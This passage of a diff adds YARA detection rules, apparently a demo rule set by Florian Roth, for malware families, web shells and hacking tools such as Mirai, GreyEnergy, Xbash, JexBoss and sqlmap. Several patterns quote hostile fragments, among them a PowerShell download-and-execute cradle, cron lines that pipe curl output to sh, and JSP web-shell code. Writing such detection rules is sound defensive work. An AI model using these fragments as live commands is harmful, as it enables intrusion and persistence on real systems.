+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a"
+      hash2 = "f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e"
+      tags = "DEMO, EXE, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "svchosts.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them
+}
+
+rule SUSP_PiratedOffice_2007_RID2EF8 : DEMO FILE OFFICE SUSP T1193 T1203 {
+   meta:
+      description = "Detects an Office document that was created with a pirated version of MS Office 2007"
+      author = "Florian Roth"
+      reference = "https://twitter.com/pwnallthethings/status/743230570440826886?lang=en"
+      date = "2018-12-04 11:37:11"
+      score = 40
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "210448e58a50da22c0031f016ed1554856ed8abe79ea07193dc8f5599343f633"
+      tags = "DEMO, FILE, OFFICE, SUSP, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "<Company>Grizli777</Company>" ascii
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 300KB and all of them
+}
+
+rule MAL_DNSPIONAGE_Malware_Nov18_RID3055 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects DNSpionage Malware"
+      author = "Florian Roth"
+      reference = "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html"
+      date = "2018-11-30 12:35:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
+      hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ".0ffice36o.com" ascii
+      $s1 = "/Client/Login?id=" ascii
+      $s2 = ".\\Configure.txt" ascii
+      $s5 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+      $s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 2 of them )
+}
+
+rule WebShell_JexBoss_JSP_1_RID2F20 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Detects JexBoss JSPs"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-11-08 11:43:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "41e0fb374e5d30b2e2a362a2718a5bf16e73127e22f0dfc89fdb17acbe89efdf"
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "equals(\"jexboss\")" 
+      $x2 = "%><pre><%if(request.getParameter(\"ppp\") != null &&" ascii
+      $s1 = "<%@ page import=\"java.util.*,java.io.*\"%><pre><% if (request.getParameter(\"" 
+      $s2 = "!= null && request.getHeader(\"user-agent\"" ascii
+      $s3 = "String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }}%>" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 1KB and 1 of ( $x* ) or 2 of them
+}
+
+rule WebShell_JexBoss_WAR_1_RID2F1D : DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detects JexBoss versions in WAR form"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-11-08 11:43:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6271775ab144ce9bb9138bf054b149b5813d3beb96338993c6de35330f566092"
+      hash2 = "6f14a63c3034d3762da8b3ad4592a8209a0c88beebcb9f9bd11b40e879f74eaf"
+      tags = "DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $ = "jbossass" fullword ascii
+      $ = "jexws.jsp" fullword ascii
+      $ = "jexws.jspPK" fullword ascii
+      $ = "jexws1.jsp" fullword ascii
+      $ = "jexws1.jspPK" fullword ascii
+      $ = "jexws2.jsp" fullword ascii
+      $ = "jexws2.jspPK" fullword ascii
+      $ = "jexws3.jsp" fullword ascii
+      $ = "jexws3.jspPK" fullword ascii
+      $ = "jexws4.jsp" fullword ascii
+      $ = "jexws4.jspPK" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and filesize < 4KB and 1 of them
+}
+
+rule MAL_BackNet_Nov18_1_RID2D6D : DEMO EXE FILE MAL T1047 {
+   meta:
+      description = "Detects BackNet samples"
+      author = "Florian Roth"
+      reference = "https://github.com/valsov/BackNet"
+      date = "2018-11-02 10:31:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc"
+      tags = "DEMO, EXE, FILE, MAL, T1047"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "ProcessedByFody" fullword ascii
+      $s2 = "SELECT * FROM AntivirusProduct" fullword wide
+      $s3 = "/C netsh wlan show profile" wide
+      $s4 = "browsertornado" fullword wide
+      $s5 = "Current user is administrator" fullword wide
+      $s6 = "/C choice /C Y /N /D Y /T 4 & Del" wide
+      $s7 = "ThisIsMyMutex-2JUY34DE8E23D7" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them
+}
+
+rule MAL_ELF_LNX_Mirai_Oct10_1_RID2F39 : DEMO FILE LINUX MAL {
+   meta:
+      description = "Detects ELF Mirai variant"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-10-27 11:48:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe"
+      tags = "DEMO, FILE, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = " -r /vi/mips.bushido; " 
+      $x2 = "/bin/busybox chmod 777 * /tmp/" fullword ascii
+      $s1 = "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1" fullword ascii
+      $s2 = "loadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>" fullword ascii
+      $s3 = "POST /cdn-cgi/" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 200KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or all of ( $x* ) )
+}
+
+rule MAL_ELF_LNX_Mirai_Oct10_2_RID2F3A : DEMO FILE LINUX MAL {
+   meta:
+      description = "Detects ELF malware Mirai related"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-10-27 11:48:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9"
+      tags = "DEMO, FILE, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $c01 = { 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00
+               20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D
+               41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A } 
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 200KB and all of them
+}
+
+rule SUSP_Win32dll_String_RID2E60 : DEMO SUSP {
+   meta:
+      description = "Detects suspicious string in executables"
+      author = "Florian Roth"
+      reference = "https://medium.com/@Sebdraven/apt-sidewinder-changes-theirs-ttps-to-install-their-backdoor-f92604a2739"
+      date = "2018-10-24 11:11:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7bd7cec82ee98feed5872325c2f8fd9f0ea3a2f6cd0cd32bcbe27dbbfd0d7da1"
+      tags = "DEMO, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "win32dll.dll" fullword ascii
+   condition: 
+      filesize < 60KB and all of them
+}
+
+rule VUL_JQuery_FileUpload_CVE_2018_9206_RID32A2 : CVE_2018_9206 DEMO EXPLOIT VULN {
+   meta:
+      description = "Detects JQuery File Upload vulnerability CVE-2018-9206"
+      author = "Florian Roth"
+      reference = "https://www.zdnet.com/article/zero-day-in-popular-jquery-plugin-actively-exploited-for-at-least-three-years/"
+      date = "2018-10-19 14:13:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2018_9206, DEMO, EXPLOIT, VULN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "error_reporting(E_ALL | E_STRICT);" fullword ascii
+      $s2 = "require('UploadHandler.php');" fullword ascii
+      $s3 = "$upload_handler = new UploadHandler();" fullword ascii
+   condition: 
+      all of them
+}
+
+rule SUSP_Size_of_ASUS_TuningTool_RID3197 : DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects an ASUS tuning tool with a suspicious size"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+      date = "2018-10-17 13:29:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "d4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a"
+      tags = "DEMO, EXE, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\Release\\ASGT.pdb" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and filesize > 70KB and all of them
+}
+
+rule APT_GreyEnergy_Malware_Oct18_1_RID31FC : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects samples from Grey Energy report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+      date = "2018-10-17 13:45:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6c52a5850a57bea43a0a52ff0e2d2179653b97ae5406e884aee63e1cf340f58b"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "%SystemRoot%\\System32\\thinmon.dll" fullword ascii
+      $s2 = "'Cannot delete list entry (fatal error)!9The module %s cannot be executed on this system (0x%.4x).%Enumerate all sessions on TSE" wide
+      $s8 = "cbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbecbe" ascii
+      $s14 = "configure the service" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and pe.imphash ( ) == "98d1ad672d0db4b4abdcda73cc9835cb" and all of them
+}
+
+rule APT_GreyEnergy_Malware_Oct18_2_RID31FD : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects samples from Grey Energy report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+      date = "2018-10-17 13:46:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c6a54912f77a39c8f909a66a940350dcd8474c7a1d0e215a878349f1b038c58a"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "WioGLtonuaptWmrnttfepgetneemVsnygnV" fullword ascii
+      $s2 = "PnSenariopoeKerGEtxrcy" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 2 of them
+}
+
+rule APT_GreyEnergy_Malware_Oct18_3_RID31FE : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects samples from Grey Energy report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+      date = "2018-10-17 13:46:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "USQTUNPPQONOPOQUMSNUTRMRRLVPUOPMROPMPMQTPNPONVUOUQOMMNNSRSRQQVTPPRSSNVSTURTMMOPTONSQTOMONQVMQNUSONTQTUTSRRPVTONUQNORQMRRNRUSPS" fullword ascii
+      $x2 = "tEMPiuP" fullword ascii
+      $x3 = "sryCEMieye" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+}
+
+rule APT_GreyEnergy_Malware_Oct18_4_RID31FF : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects samples from Grey Energy report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+      date = "2018-10-17 13:46:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6974b8acf6a8f7684673b01753c3a8248a1c491900cccf771db744ca0442f96a"
+      hash2 = "165a7853ef51e96ce3f88bb33f928925b24ca5336e49845fc5fc556812092740"
+      hash3 = "4470e40f63443aa27187a36bbb0c2f4def42b589b61433630df842b6e365ae3d"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "iiodttd.eWt" fullword ascii
+      $x2 = "irnnaar-ite-ornaa-naa-asoeienaeaanlagoeas:acnuihaaa" fullword ascii
+      $x3 = "NURVNTURVORSMSPPRTQMPTTQOQRP" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "279adfbd42308a07b3131ee57d067b3e" or 1 of them )
+}
+
+rule APT_GreyEnergy_Malware_Oct18_5_RID3200 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects samples from Grey Energy report"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
+      date = "2018-10-17 13:46:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "037723bdb9100d19bf15c5c21b649db5f3f61e421e76abe9db86105f1e75847b"
+      hash2 = "b602ce32b7647705d68aedbaaf4485f1a68253f8f8132bd5d5f77284a6c2d8bb"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s12 = "WespySSld.eQ" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+}
+
+rule MAL_JRAT_Oct18_1_RID2BF9 : DEMO FILE MAL {
+   meta:
+      description = "Detects JRAT malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-10-11 09:29:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411"
+      tags = "DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "/JRat.class" ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and filesize < 700KB and 1 of them
+}
+
+rule HKTL_SqlMap_RID2AF1 : DEMO HKTL {
+   meta:
+      description = "Detects sqlmap hacktool"
+      author = "Florian Roth"
+      reference = "https://github.com/sqlmapproject/sqlmap"
+      date = "2018-10-09 09:33:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9444478b03caf7af853a64696dd70083bfe67f76aa08a16a151c00aadb540fa8"
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "if cmdLineOptions.get(\"sqlmapShell\"):" fullword ascii
+      $x2 = "if conf.get(\"dumper\"):" fullword ascii
+   condition: 
+      filesize < 50KB and 1 of them
+}
+
+rule HKTL_SqlMap_backdoor_RID2E95 : DEMO FILE HKTL MAL SUSP {
+   meta:
+      description = "Detects SqlMap backdoors"
+      author = "Florian Roth"
+      reference = "https://github.com/sqlmapproject/sqlmap"
+      date = "2018-10-09 11:20:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, HKTL, MAL, SUSP"
+      minimum_yara = "1.7"
+      
+   condition: 
+      ( uint32 ( 0 ) == 0x8e859c07 or uint32 ( 0 ) == 0x2d859c07 or uint32 ( 0 ) == 0x92959c07 or uint32 ( 0 ) == 0x929d9c07 or uint32 ( 0 ) == 0x29959c07 or uint32 ( 0 ) == 0x2b8d9c07 or uint32 ( 0 ) == 0x2b859c07 or uint32 ( 0 ) == 0x28b59c07 ) and filesize < 2KB
+}
+
+rule SUSP_PowerShell_IEX_Download_Combo_RID33EB : ANOMALY DEMO SCRIPT SUSP T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects suspicious PowerShell download and execution cradles"
+      author = "Florian Roth"
+      reference = "https://twitter.com/JaromirHorejsi/status/1047084277920411648"
+      date = "2018-10-04 15:08:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2020-01-04"
+      type = "file"
+      hash1 = "13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5"
+      tags = "ANOMALY, DEMO, SCRIPT, SUSP, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "IEX ((new-object net.webclient).download" ascii nocase
+      $fp1 = "chocolatey.org" 
+      $fp2 = "Remote Desktop in the Appveyor" 
+      $fp3 = "/appveyor/" ascii
+   condition: 
+      $x1 and not 1 of ( $fp* )
+}
+
+rule SUSP_Script_Obfuscation_Char_Concat_RID34A0 : CHINA DEMO OBFUS SCRIPT SUSP {
+   meta:
+      description = "Detects strings found in sample from CN group repo leak in October 2018"
+      author = "Florian Roth"
+      reference = "https://twitter.com/JaromirHorejsi/status/1047084277920411648"
+      date = "2018-10-04 15:38:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b"
+      tags = "CHINA, DEMO, OBFUS, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\"c\" & \"r\" & \"i\" & \"p\" & \"t\"" ascii
+   condition: 
+      1 of them
+}
+
+rule SUSP_SFX_RunProgram_WScript_RID3143 : DEMO EXE FILE G0047 SUSP {
+   meta:
+      description = "Detects suspicious SFX as used by Gamaredon group"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-09-27 13:15:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e3bb02c5985fc64759b9c2d3c5474d46237ce472b4a0101c6313dafa939de5a9"
+      hash2 = "0ecf88d4b32895b4819dec3acb62eaaa7035aa6292499d903f76af60fcec0d6a"
+      hash3 = "a7a48f5220bd1ebe04de258d71fdd001711c165d162bd45e8cfbe8964eddf01c"
+      tags = "DEMO, EXE, FILE, G0047, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "RunProgram=\"wscript.exe" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 10000KB and 1 of them
+}
+
+rule SUSP_CMD_Var_Expansion_RID2F2B : DEMO FILE OFFICE SUSP {
+   meta:
+      description = "Detects Office droppers that include a variable expansion string"
+      author = "Florian Roth"
+      reference = "https://twitter.com/asfakian/status/1044859525675843585"
+      date = "2018-09-26 11:45:41"
+      score = 45
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, OFFICE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = " /V:ON" ascii wide fullword
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 500KB and $a1
+}
+
+rule MAL_Xbash_PY_Sep18_RID2D38 : DEMO FILE MAL SCRIPT {
+   meta:
+      description = "Detects Xbash malware"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+      date = "2018-09-18 10:22:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa"
+      tags = "DEMO, FILE, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = { 73 58 62 61 73 68 00 00 00 00 00 00 00 00 } 
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 10000KB and 1 of them
+}
+
+rule MAL_Xbash_SH_Sep18_RID2D2A : DEMO FILE MAL SCRIPT {
+   meta:
+      description = "Detects Xbash malware"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+      date = "2018-09-18 10:20:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af"
+      hash2 = "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d"
+      tags = "DEMO, FILE, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "echo \"*/5 * * * * curl -fsSL" fullword ascii
+      $s2 = ".sh|sh\" > /var/spool/cron/root" ascii
+      $s3 = "#chmod +x /tmp/hawk" fullword ascii
+      $s4 = "if [ ! -f \"/tmp/root.sh\" ]" fullword ascii
+      $s5 = ".sh > /tmp/lower.sh" ascii
+      $s6 = "chmod 777 /tmp/root.sh" fullword ascii
+      $s7 = "-P /tmp && chmod +x /tmp/pools.txt" fullword ascii
+      $s8 = "-C /tmp/pools.txt>/dev/null 2>&1" ascii
+   condition: 
+      uint16 ( 0 ) == 0x2123 and filesize < 3KB and 1 of them
+}
+
+rule MAL_Xbash_JS_Sep18_RID2D2C : DEMO MAL {
+   meta:
+      description = "Detects XBash malware"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
+      date = "2018-09-18 10:20:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8"
+      tags = "DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "var path=WSHShell" fullword ascii
+      $s2 = "var myObject= new ActiveXObject(" ascii
+      $s3 = "window.resizeTo(0,0)" fullword ascii
+      $s4 = "<script language=\"JScript\">" fullword ascii
+   condition: 
+      filesize < 5KB and 3 of them
+}
+
+rule SUSP_Microsoft_7z_SFX_Combo_RID3120 : ANOMALY DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects a suspicious file that has a Microsoft copyright and is a 7z SFX"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-09-16 13:09:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1"
+      tags = "ANOMALY, DEMO, EXE, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "7ZSfx%03x.cmd" fullword wide
+      $s2 = "7z SFX: error" fullword ascii
+      $c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
+              00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9
+              00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
+              00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F
+              00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
+              00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68
+              00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72
+              00 76 00 65 00 64 00 2E } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $s* ) and $c1
+}
+
+rule SUSP_Microsoft_RAR_SFX_Combo_RID3154 : ANOMALY DEMO EXE FILE SUSP {
+   meta:
+      description = "Detects a suspicious file that has a Microsoft copyright and is a RAR SFX"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2018-09-16 13:17:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "ANOMALY, DEMO, EXE, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "winrarsfxmappingfile.tmp" fullword wide
+      $s2 = "WinRAR self-extracting archive" fullword wide
+      $s3 = "WINRAR.SFX" fullword
+      $c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
+              00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9
+              00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
+              00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F
+              00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
+              00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68
+              00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72
+              00 76 00 65 00 64 00 2E } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $s* ) and $c1
+}
+
+rule HTKL_BlackBone_DriverInjector_RID320D : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects BlackBone Driver injector"
+      author = "Florian Roth"
+      reference = "https://github.com/DarthTon/Blackbone"
+      date = "2018-09-11 13:48:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8062a4284c719412270614458150cb4abbdf77b2fc35f770ce9c45d10ccb1f4d"
+      hash2 = "2d2fc27200c22442ac03e2f454b6e1f90f2bbc17017f05b09f7824fac6beb14b"
+      hash3 = "e45da157483232d9c9c72f44b13fca2a0d268393044db00104cc1afe184ca8d1"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "=INITtH=PAGEtA" fullword ascii
+      $s2 = "BBInjectDll" fullword ascii
+      $s3 = "LdrLoadDll" fullword ascii
+      $s4 = "\\??\\pipe\\%ls" fullword wide
+      $s5 = "Failed to retrieve Kernel base address. Aborting" fullword ascii
+      $x2 = "BlackBone: %s: APC injection failed with status 0x%X" fullword ascii
+      $x3 = "BlackBone: PDE_BASE/PTE_BASE not found " fullword ascii
+      $x4 = "%s: Invalid injection type specified - %d" fullword ascii
+      $x6 = "Trying to map C:\\windows\\system32\\cmd.exe into current process" fullword wide
+      $x7 = "\\BlackBoneDrv\\bin\\" ascii
+      $x8 = "DosDevices\\BlackBone" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 8000KB and ( 3 of them or 1 of ( $x* ) )
+}
+
+rule APT_Lazarus_Aug18_Downloader_1_RID321A : APT DEMO EXE FILE G0032 MAL NK {
+   meta:
+      description = "Detects Lazarus Group Malware Downloadery"
+      author = "Florian Roth"
+      reference = "https://securelist.com/operation-applejeus/87553/"
+      date = "2018-08-24 13:50:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d555dcb6da4a6b87e256ef75c0150780b8a343c4a1e09935b0647f01d974d94d"
+      hash2 = "bdff852398f174e9eef1db1c2d3fefdda25fe0ea90a40a2e06e51b5c0ebd69eb"
+      hash3 = "e2199fc4e4b31f7e4c61f6d9038577633ed6ad787718ed7c39b36f316f38befd"
+      tags = "APT, DEMO, EXE, FILE, G0032, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "H:\\DEV\\TManager\\" ascii
+      $x2 = "\\Release\\dloader.pdb" ascii
+      $x3 = "Z:\\jeus\\" 
+      $x4 = "\\Debug\\dloader.pdb" ascii
+      $x5 = "Moz&Wie;#t/6T!2yW29ab@ad%Df324V$Yd" fullword ascii
+      $s1 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" fullword ascii
+      $s2 = "Error protecting memory page" fullword ascii
+   condition: 
